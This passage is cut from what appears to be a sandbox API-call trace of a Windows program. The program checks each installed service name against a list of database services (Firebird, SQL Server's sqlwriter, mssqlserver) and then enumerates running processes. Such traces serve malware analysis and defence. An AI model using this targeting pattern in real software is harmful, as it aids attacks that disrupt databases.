(lpString1="sqlwriter", lpString2="BITS") returned 1 [0224.551] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0224.551] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0224.551] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0224.551] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0224.551] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0224.551] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0224.551] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0224.551] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0224.551] lstrlenW (lpString="CDPSvc") returned 6 [0224.551] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0224.551] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0224.551] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0224.552] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0224.552] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0224.552] lstrlenW (lpString="ClickToRunSvc") returned 13 [0224.552] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0224.552] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0224.552] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0224.552] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0224.552] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0224.552] lstrlenW (lpString="ClipSVC") returned 7 [0224.552] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClipSVC") returned 1 [0224.552] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClipSVC") returned 1 [0224.552] lstrcmpiW (lpString1="sqlwriter", lpString2="ClipSVC") returned 1 [0224.552] lstrcmpiW (lpString1="mssqlserver", lpString2="ClipSVC") returned 1 [0224.552] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClipSVC") returned 1 [0224.552] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0224.552] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0224.552] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0224.552] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0224.552] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0224.552] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0224.552] lstrlenW (lpString="CryptSvc") returned 8 [0224.552] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0224.552] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0224.552] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0224.552] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0224.552] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0224.552] lstrlenW (lpString="DcomLaunch") returned 10 [0224.552] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0224.552] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0224.552] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0224.552] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0224.552] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0224.552] lstrlenW (lpString="DeviceAssociationService") returned 24 [0224.552] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0224.552] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0224.553] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0224.553] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0224.553] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0224.553] lstrlenW (lpString="Dhcp") returned 4 [0224.553] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0224.553] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0224.553] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0224.553] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0224.553] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0224.553] lstrlenW (lpString="Dnscache") returned 8 [0224.553] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0224.553] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0224.553] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0224.553] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0224.553] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0224.553] lstrlenW (lpString="DoSvc") returned 5 [0224.553] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0224.553] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0224.553] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0224.553] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0224.553] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0224.553] lstrlenW (lpString="DPS") returned 3 [0224.553] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0224.553] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0224.553] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0224.553] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0224.553] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0224.553] lstrlenW (lpString="DusmSvc") returned 7 [0224.553] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0224.553] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0224.553] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0224.553] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0224.553] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0224.553] lstrlenW (lpString="EventLog") returned 8 [0224.553] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0224.553] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0224.553] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0224.554] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0224.554] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0224.554] lstrlenW (lpString="EventSystem") returned 11 [0224.554] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0224.554] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0224.554] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0224.554] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0224.554] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0224.554] lstrlenW (lpString="FontCache") returned 9 [0224.554] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0224.554] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0224.554] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0224.554] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0224.554] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0224.554] lstrlenW (lpString="gpsvc") returned 5 [0224.554] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0224.554] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0224.554] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0224.554] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0224.554] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0224.554] lstrlenW (lpString="iphlpsvc") returned 8 [0224.554] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0224.554] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0224.554] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0224.554] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0224.554] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0224.554] lstrlenW (lpString="KeyIso") returned 6 [0224.554] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0224.554] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0224.554] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0224.554] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0224.554] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0224.554] lstrlenW (lpString="LanmanServer") returned 12 [0224.554] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0224.554] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0224.554] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0224.554] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0224.555] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0224.555] lstrlenW (lpString="LanmanWorkstation") returned 17 [0224.555] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0224.555] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0224.555] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0224.555] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0224.555] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0224.555] lstrlenW (lpString="lfsvc") returned 5 [0224.555] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0224.555] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0224.555] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0224.555] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0224.555] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0224.555] lstrlenW (lpString="LicenseManager") returned 14 [0224.555] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LicenseManager") returned -1 [0224.555] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LicenseManager") returned -1 [0224.555] lstrcmpiW (lpString1="sqlwriter", lpString2="LicenseManager") returned 1 [0224.555] lstrcmpiW (lpString1="mssqlserver", lpString2="LicenseManager") returned 1 [0224.555] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LicenseManager") returned 1 [0224.555] lstrlenW (lpString="lmhosts") returned 7 [0224.555] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0224.555] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0224.555] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0224.555] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0224.555] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0224.555] lstrlenW (lpString="LSM") returned 3 [0224.555] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0224.555] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0224.555] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0224.555] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0224.555] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0224.555] lstrlenW (lpString="MpsSvc") returned 6 [0224.555] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0224.555] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0224.555] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0224.555] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0224.555] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0224.556] lstrlenW (lpString="NcbService") returned 10 [0224.556] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0224.556] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0224.556] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0224.556] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0224.556] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0224.556] lstrlenW (lpString="netprofm") returned 8 [0224.556] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0224.556] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0224.556] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0224.556] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0224.556] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0224.556] lstrlenW (lpString="NlaSvc") returned 6 [0224.556] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0224.556] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0224.556] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0224.556] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0224.556] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0224.556] lstrlenW (lpString="nsi") returned 3 [0224.556] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0224.556] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0224.556] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0224.556] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0224.556] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0224.556] lstrlenW (lpString="PcaSvc") returned 6 [0224.556] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0224.556] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0224.556] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0224.556] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0224.556] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0224.556] lstrlenW (lpString="PlugPlay") returned 8 [0224.556] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0224.556] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0224.556] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0224.556] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0224.556] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0224.557] lstrlenW (lpString="Power") returned 5 [0224.557] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0224.557] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0224.557] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0224.557] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0224.557] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0224.557] lstrlenW (lpString="ProfSvc") returned 7 [0224.557] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0224.557] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0224.557] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0224.557] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0224.557] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0224.557] lstrlenW (lpString="RpcEptMapper") returned 12 [0224.557] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0224.557] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0224.557] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0224.557] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0224.557] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0224.557] lstrlenW (lpString="RpcSs") returned 5 [0224.557] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0224.557] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0224.557] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0224.557] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0224.557] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0224.557] lstrlenW (lpString="SamSs") returned 5 [0224.557] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0224.557] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0224.557] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0224.557] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0224.557] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0224.557] lstrlenW (lpString="Schedule") returned 8 [0224.557] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0224.557] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0224.557] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0224.557] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0224.557] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0224.557] lstrlenW (lpString="SecurityHealthService") returned 21 [0224.558] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0224.558] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0224.558] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0224.558] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0224.558] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0224.558] lstrlenW (lpString="SENS") returned 4 [0224.558] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0224.558] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0224.558] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0224.558] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0224.558] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0224.558] lstrlenW (lpString="ShellHWDetection") returned 16 [0224.558] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0224.558] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0224.558] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0224.558] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0224.558] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0224.558] lstrlenW (lpString="Spooler") returned 7 [0224.558] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0224.558] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0224.558] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0224.558] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0224.558] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0224.558] lstrlenW (lpString="sppsvc") returned 6 [0224.558] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="sppsvc") returned -1 [0224.558] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="sppsvc") returned -1 [0224.558] lstrcmpiW (lpString1="sqlwriter", lpString2="sppsvc") returned 1 [0224.558] lstrcmpiW (lpString1="mssqlserver", lpString2="sppsvc") returned -1 [0224.558] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="sppsvc") returned 1 [0224.558] lstrlenW (lpString="SSDPSRV") returned 7 [0224.558] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0224.558] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0224.558] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0224.558] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0224.559] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x45c [0224.562] Process32FirstW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0224.563] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0224.564] lstrlenW (lpString="System") returned 6 [0224.564] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0224.565] lstrlenW (lpString="smss.exe") returned 8 [0224.565] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0224.566] lstrlenW (lpString="csrss.exe") returned 9 [0224.566] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0224.567] lstrlenW (lpString="wininit.exe") returned 11 [0224.567] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0224.567] lstrlenW (lpString="csrss.exe") returned 9 [0224.568] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0224.568] lstrlenW (lpString="winlogon.exe") returned 12 [0224.568] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0224.569] lstrlenW (lpString="services.exe") returned 12 [0224.569] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0224.570] lstrlenW (lpString="lsass.exe") returned 9 [0224.570] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.570] lstrlenW (lpString="svchost.exe") returned 11 [0224.571] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0224.571] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0224.571] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0224.572] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0224.572] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.573] lstrlenW (lpString="svchost.exe") returned 11 [0224.573] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0224.573] lstrlenW (lpString="dwm.exe") returned 7 [0224.574] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x58, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.574] lstrlenW 